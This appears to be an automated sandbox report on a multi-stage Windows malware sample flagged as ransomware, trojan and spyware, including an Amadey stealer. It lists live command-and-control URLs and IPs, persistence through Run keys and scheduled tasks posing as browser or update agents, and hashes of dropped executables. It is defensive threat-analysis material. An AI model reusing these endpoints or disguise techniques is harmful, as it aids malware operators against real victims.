http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5Response	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aa.imgjeoogbb.com/check/safew1	aafg31.exe, 0000001A.00000002.801363559.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonB	5274.exe, 00000018.00000003.670975307.0000000000731000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 00000018.00000002.674374983.0000000000733000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	325D.exe, 00000011.00000002.878802672.000000000455F000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22Response.oP	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aa.imgjeoogbb.com/j2D	aafg31.exe, 0000001A.00000003.692757312.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.692248111.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id8Response	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, 325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro	explorer.exe, 00000003.00000000.568040981.00007FF883839000.00000002.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://5.42.65.80/8bmeVwqx/index.php9	oneetx.exe, 0000001D.00000002.802176864.0000000001526000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://5.42.65.80/8bmeVwqx/index.php:	oneetx.exe, 0000001D.00000002.802176864.0000000001567000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aa.imgjeoogbb.com/check/safe014	aafg31.exe, 0000001A.00000003.697919926.0000000000E64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://5.42.65.80/8bmeVwqx/index.phpB	oneetx.exe, 0000001D.00000002.802176864.0000000001526000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.openssl.org/support/faq.html	5274.exe, 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	E640.exe, 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, E640.exe, 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 617B.exe, 00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp, 617B.exe, 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, C474.exe, 0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp, C474.exe, 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp, 5274.exe, 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 5274.exe, 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.2ip.ua/geo.jsony	5274.exe, 0000000A.00000003.641630319.00000000006DC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	325D.exe, 00000011.00000002.878802672.0000000004457000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	325D.exe, 00000011.00000002.878802672.00000000043C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aa.imgjeoogbb.com/check/safe&-)	aafg31.exe, 0000001A.00000003.715431971.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 0000001A.00000003.715665719.0000000000E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aa.imgjeoogbb.com/check/safe#5v	aafg31.exe, 0000001A.00000003.686624260.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.jsonw	E640.exe, 00000006.00000002.634735548.00000000007D7000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.100.211.218	us.imgjeoigaa.com	Hong Kong	133115	HKKFGL-AS-APHKKwaifongGroupLimitedHK	false
193.106.174.125	reinroot.top	Russian Federation	50465	IQHOSTRU	false
175.119.10.231	colisumy.com	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false
162.0.217.254	api.2ip.ua	Canada	35893	ACPCA	false
154.221.26.108	aa.imgjeoogbb.com	Seychelles	133115	HKKFGL-AS-APHKKwaifongGroupLimitedHK	false
196.188.169.138	unknown	Ethiopia	24757	EthioNet-ASET	true
95.86.21.52	unknown	Macedonia	49056	INEL-AS-MK	true
51.89.201.49	unknown	France	16276	OVHFR	true
89.208.104.62	unknown	Russian Federation	42569	PSKSET-ASRU	true
80.66.203.53	shsplatform.co.uk	United Kingdom	61323	UKFASTGB	false
213.6.54.58	nordskills.eu	Palestinian Territory Occupied	12975	PALTEL-ASPALTELAutonomousSystemPS	false
115.88.24.200	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
45.9.74.80	unknown	Russian Federation	200740	FIRST-SERVER-EU-ASRU	true
151.251.31.98	unknown	Bulgaria	13124	IBGCBG	true
188.114.97.7	potunulit.org	European Union	13335	CLOUDFLARENETUS	false
200.114.247.163	unknown	Argentina	10318	TelecomArgentinaSAAR	true
95.214.25.207	unknown	Germany	33657	CMCSUS	true
188.114.96.7	www.fcwcvt.org	European Union	13335	CLOUDFLARENETUS	false
5.42.65.80	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
183.100.39.157	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
190.224.203.37	unknown	Argentina	7303	TelecomArgentinaSAAR	true
185.12.79.25	greenbi.net	Bosnia and Herzegowina	9146	BIHNETBIHNETAutonomusSystemBA	false
91.227.16.22	h170013.srv22.test-hf.su	Russian Federation	207027	EXIMIUS-ASRU	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1281402
Start date and time:	2023-07-27 20:17:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@75/32@148/24
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 53.6% (good quality ratio 47.9%) Quality average: 73.4% Quality standard deviation: 34.3%
HCA Information:	Successful, ratio: 83% Number of executed functions: 38 Number of non-executed functions: 105
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, audiodg.exe, dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
Excluded domains from analysis (whitelisted): gstatic-node.io, t.me, ctldl.windowsupdate.com, adriaenclaeys.top, zexeq.com, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:18:32	API Interceptor	522x Sleep call for process: explorer.exe modified
20:18:39	Task Scheduler	Run new task: Firefox Default Browser Agent F8FC2574A2C154C1 path: C:\Users\user\AppData\Roaming\rfuiwjh
20:18:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
20:18:52	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe s>--Task
20:19:00	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
20:19:07	Task Scheduler	Run new task: oneetx.exe path: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe
20:19:08	API Interceptor	546x Sleep call for process: oneetx.exe modified
20:19:15	API Interceptor	8x Sleep call for process: aafg31.exe modified
20:19:27	Task Scheduler	Run new task: Firefox Default Browser Agent 5D175001F2825C44 path: C:\Users\user\AppData\Roaming\fvuiwjh
20:19:51	API Interceptor	58x Sleep call for process: 325D.exe modified
20:19:53	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
20:20:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
20:20:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
20:20:41	Task Scheduler	Run new task: NoteUpdateTaskMachineQC path: C:\Program Files\Notepad\Chrome\updater.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\f6f6d26e957fdb6a96caaf1481890445

Download File

Process:	C:\Users\user\AppData\Local\Temp\aafg31.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.43613063485556663
Encrypted:	false
SSDEEP:	12:TLqlUIFnGP6Gkwtwhg4FdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0u9z3:TLqlj1czkwubXYFpFNYcw+6UwcYzHr
MD5:	46076967A4692D6323BCBDAD8532DA6A
SHA1:	A2C61F0EAECF8C2D126FCF82828808B78291E582
SHA-256:	BFA77719DCA9C4C92B38BD8A23C9DD751B82DB0F21620E6937C4F97AECC5536B
SHA-512:	B4C03F075B2E4DC527AD25B5D5788BE55D4CBCCA66002884CC75528FC57AF54C494B2219C726999E9A29C5AB05C789DB1412F4A01A8AC61726E2F7B785E77691
Malicious:	true
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FE5F.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\FE5F.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.340009400190196
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
MD5:	CC144808DBAF00E03294347EADC8E779
SHA1:	A3434FC71BA82B7512C813840427C687ADDB5AEA
SHA-256:	3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
SHA-512:	A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	985
Entropy (8bit):	5.225141189452099
Encrypted:	false
SSDEEP:	24:YqHZ6T06MhmimH6CUXyhm/mYbNdB6hmUmYz0JahmDmYbxdB6hm1mY7KTdB6hmuXA:YqHZ6T06McLHDUXyceYbNdUcZYz0Jack
MD5:	094FB5672ED4D4990DF33BE15CE2CB40
SHA1:	2BF77D89C6637F478893D63DFC809808C835A839
SHA-256:	19FEE75854625F0D51FE350049FE33EB16CB40E728C9BAADB232CA3E449DECA3
SHA-512:	A542CF7E0BE301B8BB2E369B0750D0C93941E02D044BFA840A28FBBEDD3F3EAF2D4E0F01ED0B3F836C916D0F0B79EEDD084DBE941A6424947C4EFE87AF38B304
Malicious:	false
Reputation:	unknown
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3031678576,"LastSwitchedHighPart":30840569,"PrePopulated":false},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4008173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3998173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3988173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3968173792,"LastSwitchedHighPart":30747923,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3958173792,"LastSwitchedHighPart":30747923,"PrePopulated":true}]}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\imagc[1].jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\aafg31.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1080x1440, components 3
Category:	dropped
Size (bytes):	1506508
Entropy (8bit):	6.926989858619382
Encrypted:	false
SSDEEP:	24576:SMaEt+i3CaSEKFaGWWEfpVk3XFc8ZSK10CGWQw6tsJCetgJlfpsP45:SIoigCWERVk3XsgQw6jeU2PY
MD5:	6ED71A5BC6E0C24D6BAD213EFD6D6349
SHA1:	59F252310BD9AACC4E219D3F3B374532C7176B4B
SHA-256:	EFA20F0295EDF9EA8364293CB82F4C408DC89F6F4451A5736BC021D13F449EC8
SHA-512:	1C269614B447C97E21DDC54CA3EBC98FC9D514FE6275F0C84B32CE5B961A7CD0589B37FC4579EE215939C7400CA0961CA61D3FD9B239B81062925AD5062FC3DD
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.............C....................................................................C.........................................................................8............................................c.........................!.."1A.2Q.#BRaq3br............$4CS...c....%s.....&5DTd..'6EUet....7F.....................................>......................!.1.A..."2Qa.#3q..B....$4...C.DRr.b..............?....{.e..#y.\|..,....P.b...?...'(..+....#.....B....:,9=.o5..,.b...M:,rP.w....<.C1......&.....lP....OrP.rZ....P,M.y"...,.....@X..oD..@;: ,......$...P.p.....pg....:.<.......;...8..B.......)..,........a.. ..!.!0..r.P.......f.....O..t...o.'...[.....o`h..4.m\|,..G....<<0@.?.F.*R7Sd...e.@.._.@...j..FGy.,..{..0.X..6.h7...E..wF..r..nl.Yp....o....j`..T...Y].7.m.J.a....g..@..,..<L.TD.Ra...u.....BS.\......+><{N8.rA....G..#....n.....F......\|#.;....Bs..n6....a..\|..5d...g..\|.w.4...}...I\|....S..>........aRW;~g..y.I4_)....)...(v.w.............]2.k}>P...^...\|..=.c.u...V

C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\oldplayer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	202752
Entropy (8bit):	6.344899274055935
Encrypted:	false
SSDEEP:	3072:lWgR9+o+G2K47yLk6E9EzwHxFTTDYUSNt2kLu5gf7or7wy+wXRcWfnPjt:lWu+5a4ukZSwH/TT2NE4u5gTovv
MD5:	A64A886A695ED5FB9273E73241FEC2F7
SHA1:	363244CA05027C5BEB938562DF5B525A2428B405
SHA-256:	563ACABE49CC451E9CAAC20FAE780BAD27EA09AAEFAAF8A1DFD838A00DE97144
SHA-512:	122779AD7BCE927E1B881DF181FCC3181080D3929A67F750358FA446A21397B998D167C03AED5F3BDC3CD7A1F17E4DA095F9B4A9367C6357CABEFCF8CDD29474
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 89%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L....+.d.................Z..........o;.......p....@..........................`............@.....................................d.... .......................0..p ..`...p...................t...........@............p...............................text....Y.......Z.................. ..`.rdata..t\|...p...~...^..............@..@.data...h$..........................@....rsrc........ ......................@..@.reloc..p ...0..."..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2A49.dll

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1347584
Entropy (8bit):	7.962354296379694
Encrypted:	false
SSDEEP:	24576:Y62I94csnXcypgYhG51C71cD1MX/3nIuGIIHFUwVmoipEu98M8EBSUj1m5u/x:kI9BSdNWEZcQFGIGsnt8Km5u5
MD5:	94BD99CA344DF7DD89EF24DA11E8B502
SHA1:	31E6C5A7A4B7BD2E2C44F30D745AE90D2AD913EB
SHA-256:	3D952A9DB0E60433E7FDDD023430CD8E0100FB6BFFC34B5A33B093CDC8E9E5EC
SHA-512:	51A168B2C4CCCB3E1507877C58C76A3C3CD14B9AEC3EB5F661A520DF9D9B6A0F0BCCCB10E377FE6AA7D184AF004F4D454DE074DA70C2AD71B116B2EE332D2A41
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Reputation:	unknown
Preview:	MZ......................@.........................................d...........ar.....w...>.................2..............u.......2.......B`....2..............r.......Rich...............................................PE..L......d...........!..............................@.....................................................................H....$.......p..h............................................................................................................text...P........................... ..`.rdata...).......0..................@..@.data....?...0...0...0..............@....rsrc...h....p.......`..............@..@.reloc..h........ ...p..............@..B....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\325D.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	414208
Entropy (8bit):	6.170206548433971
Encrypted:	false
SSDEEP:	6144:cFEH4fAOWbh8hrpDpykhcggSQwCZOK6WB3m6YI0B6Q:cJffWbihrnbhcKZeN2B6
MD5:	7A366DFF7F1AA77CA3371742D300468B
SHA1:	E775533C079EB3149F481756DE5FD1706A02BC79
SHA-256:	C1618FA94AD1FF62AE82905FB63448FD1275CF09FD29EFA8A0A4B68215E59739
SHA-512:	2396A65E7072E2D850FB75B9E483D060718F9B0D63772A2057822212B96AF861AE34DB997043FC41B1B6C31E7787D190512C159D3457FD9F5D2A76F303AA1E3A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X.vy..vy..vy......vy......vy......vy......vy..vx..vy......vy......vy......vy.Rich.vy.........PE..L.....c.................t...........T............@........................................................................4u..d........<..........................................................x5..@...............4............................text...(r.......t.................. ..`.data................x..............@....rsrc....<.......>..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\48EA.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	487936
Entropy (8bit):	6.557143281218472
Encrypted:	false
SSDEEP:	6144:EhIYG23NehzBQwGjn83at6J+iCclPUQi5J/R9tvQxKsw:923ghzS/bzt6JfcH5J/LtvQxK9
MD5:	7A27D073C224D7F811999469D13C18AB
SHA1:	F4DC1563EA25D0BFA10623E55F741C6864DF2A8B
SHA-256:	83FB39B83F87A4F7CE15ACEA69642BF9929C50D8E96043A2A24166FA786C8919
SHA-512:	66D8095C318DD90236FAFCD57506FE18730BC20DF834012A7E5B8C5169CB550B9340AEC5C2304BE6D425D62D3E79EC48286C9CCDD21BD2BF11CA67321943833A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........vy..vy..vy....vy.....vy.....vy....vy..vx..vy.....vy....vy....vy.Rich.vy.................PE..L......c.................r...........T............@..........................................................................u..d........;..........................................................h5..@............... ............................text....q.......r.................. ..`.data...l............v..............@....rsrc....;.......<...6..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4F92.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	647680
Entropy (8bit):	7.024033720862588
Encrypted:	false
SSDEEP:	12288:fxpO6rJYR9z8fcKObTrge4calxG7G/R2dmyplrx3r3j1+:fxU6dYT8fKPUaa7GK/WlJro
MD5:	CA67C9C17A701B0664B90DE372ACDFB1
SHA1:	8D7E388B5D276816279EF37E7CAB9CD554251737
SHA-256:	DB47DF7CF51747E533C968DA7452F1CE6D20F465D7FCD6E2EAC559266AC3E9ED
SHA-512:	B3DADF871AABA70FAFB20E6AF4601013B225EB27565E6CEA73A739F90993E84F581B0A719AE61019E082B25EF0CDC4C573CBA2BD669C2A7310D8FAE5A6A87B04
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............V...V...V..W...V..W...V..W...V..UV...V..WV..V..VV...V}toV...V...V...V..W...V..[V...V..W...VRich...V........PE..L....6.d.....................j......U.............@..........................0............@....................................(...............................P......................................@...............4............................text...+........................... ..`.rdata...!......."..................@..@.data...X*....... ..................@....gfids..............................@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5274.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	842240
Entropy (8bit):	7.3224462781755095
Encrypted:	false
SSDEEP:	24576:k8q+mCX1XlvT/duOkWSYNK1a0v3u+3g9:k8CCFXlv8+SGKPPu+Q9
MD5:	8471A1A3950D0B7A56B8EC23F8201F97
SHA1:	EA0A430709F43D3395C5AA581B9F52919A195CFC
SHA-256:	540A56DD60D8EE5EA9091EDAF421D8C4AB950AF9A85001D0B70508505D739BD5
SHA-512:	D1EF86623816AF755DB64AB6FA68DDC1A6C94EF9942BC8A67601C2B45AFAB92210C52A334EE3E6E79F461238FD6F90BB137E9E37BB9ED25466A299DCDF16501E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+m.hE>.hE>.hE>...>.hE>...>.hE>...>.hE>...>.hE>.hD>shE>...>.hE>...>.hE>...>.hE>Rich.hE>........PE..L...bg.c.................r...F.......U............@..........................P......9`......................................4u..P........;...........................................................5..@............................................text...Dq.......r.................. ..`.data...l\|.......(...v..............@....rsrc....;.......<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\617B.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	842240
Entropy (8bit):	7.3224462781755095
Encrypted:	false
SSDEEP:	24576:k8q+mCX1XlvT/duOkWSYNK1a0v3u+3g9:k8CCFXlv8+SGKPPu+Q9
MD5:	8471A1A3950D0B7A56B8EC23F8201F97
SHA1:	EA0A430709F43D3395C5AA581B9F52919A195CFC
SHA-256:	540A56DD60D8EE5EA9091EDAF421D8C4AB950AF9A85001D0B70508505D739BD5
SHA-512:	D1EF86623816AF755DB64AB6FA68DDC1A6C94EF9942BC8A67601C2B45AFAB92210C52A334EE3E6E79F461238FD6F90BB137E9E37BB9ED25466A299DCDF16501E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+m.hE>.hE>.hE>...>.hE>...>.hE>...>.hE>...>.hE>.hD>shE>...>.hE>...>.hE>...>.hE>Rich.hE>........PE..L...bg.c.................r...F.......U............@..........................P......9`......................................4u..P........;...........................................................5..@............................................text...Dq.......r.................. ..`.data...l\|.......(...v..............@....rsrc....;.......<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

